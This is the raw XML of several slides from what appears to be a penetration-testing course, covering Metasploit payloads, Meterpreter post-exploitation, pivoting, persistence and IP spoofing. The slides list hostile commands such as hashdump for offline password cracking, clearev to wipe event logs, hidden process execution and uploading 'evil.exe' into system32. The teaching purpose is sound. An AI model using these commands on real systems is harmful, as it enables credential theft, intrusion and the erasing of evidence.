              <a:t>bind_tcp will listen for attacker to connect.  Reverse payload will connect back to the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="990600"/>
            <a:ext cx="12204700" cy="763588"/>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Exploitation Basics (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043"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“exploit” to run exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Will open session to target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“background” will send session to the background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“session –i 1” will return to the first session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87044" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4951413" y="4602163"/>
            <a:ext cx="7037387" cy="4987925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="914400"/>
            <a:ext cx="12204700" cy="811213"/>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Meterpreter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Meta-Interpreter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Advanced payload which operates via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Resides completely in memory.   No hard disk writes at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Scripts and plugins supported</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Well supported and constant development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Encrypted communications between the attacker and payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Remote command execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>In-memory process migration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Registry modifications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Pivoting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>File system support and more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91435" tIns="45718" rIns="91435" bIns="45718"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D4116237-2912-4B5A-BB08-CE8802ADB9C2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="1100" smtClean="0"/>
              <a:pPr/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="838200"/>
            <a:ext cx="11703050" cy="752475"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130039" tIns="65020" rIns="130039" bIns="65020" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" b="1" i="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How it Works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="89092" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1625600" y="1406525"/>
          <a:ext cx="9753600" cy="7332663"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s89114" name="Visio" r:id="rId4" imgW="4612640" imgH="4146296" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="4612640" imgH="4146296" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Object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5600" y="1406525"/>
                        <a:ext cx="9753600" cy="7332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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="990600"/>
            <a:ext cx="12204700" cy="80962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Now What?  - Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115"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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Meterpreter Basics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>migrate – migrates the meterpreter dll injection to a different process.   Explorer.exe is a good choice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sysinfo – displays information about the target system </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>download – “download c:\\boot.ini”   -  downloads from the target machine. Note double slashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>upload – “upload evil.exe c:\\windows\system32” – uploads file to the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>getuid – returns the userid (permissions) that meterpreter is running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>execute – “execute –f cmd.exe –i –H”  runs command on the remote machine. –i runs the command interactively.   -H hides the process from user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hashdump – dumps the SAM database for offline cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>clearev – clears the windows events logs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8986838"/>
            <a:ext cx="13004800" cy="461962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Much more at: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics</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bwMode="auto">
          <a:xfrm>
            <a:off x="254000" y="990600"/>
            <a:ext cx="12204700" cy="80962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Pivoting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91139" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="1905000"/>
            <a:ext cx="11703050" cy="6435725"/>
          </a:xfrm>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Pivoting is using one compromised machine to further exploit other hosts or networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example would be a client side “drive by browser” attack.  Once the attacker owns this machine inside the firewall, they can launch all further attacks from this compromised machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91140" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="5029200"/>
            <a:ext cx="11993563" cy="4425950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>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bwMode="auto">
          <a:xfrm>
            <a:off x="330200" y="914400"/>
            <a:ext cx="12204700" cy="8255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Pivoting using Meterpreter </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92163" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="1905000"/>
            <a:ext cx="11703050" cy="6435725"/>
          </a:xfrm>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Add route from attacker machine to remote network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“route add 10.100.100.0 255.255.255.0 1” adds a route to the remote network through meterpreter session 1.  Further attacks to 10.100.100.0 will traverse this session and the already exploited host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92164" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2463800" y="4876800"/>
            <a:ext cx="8147050" cy="4641850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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bwMode="auto">
          <a:xfrm>
            <a:off x="406400" y="990600"/>
            <a:ext cx="12204700" cy="7493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Persistence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187"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If remote target reboots, meterpreter session is lost.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Might be ok if exploit is reliable.  Just run again.   However, this is usually not the case.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Two ways to perform persistence with Meterpreter:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Persistence script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-571500" algn="l">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Metsvc</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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9331325"/>
            <a:ext cx="650875" cy="422275"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{128E8E82-0A52-48A6-B44F-C43F69C13434}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="762000"/>
            <a:ext cx="11053763" cy="100012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IP address spoofing (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9224" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="5943600"/>
            <a:ext cx="11053763" cy="3459163"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>But attacker cannot interact with victim. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Unless attacker is on path between victim and spoofed address.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8197" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1965325" y="3070225"/>
          <a:ext cx="869950" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s8263" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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5325" y="3070225"/>
                        <a:ext cx="869950" cy="739775"/>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8198" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9550400" y="3070225"/>
          <a:ext cx="868363" cy="739775"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
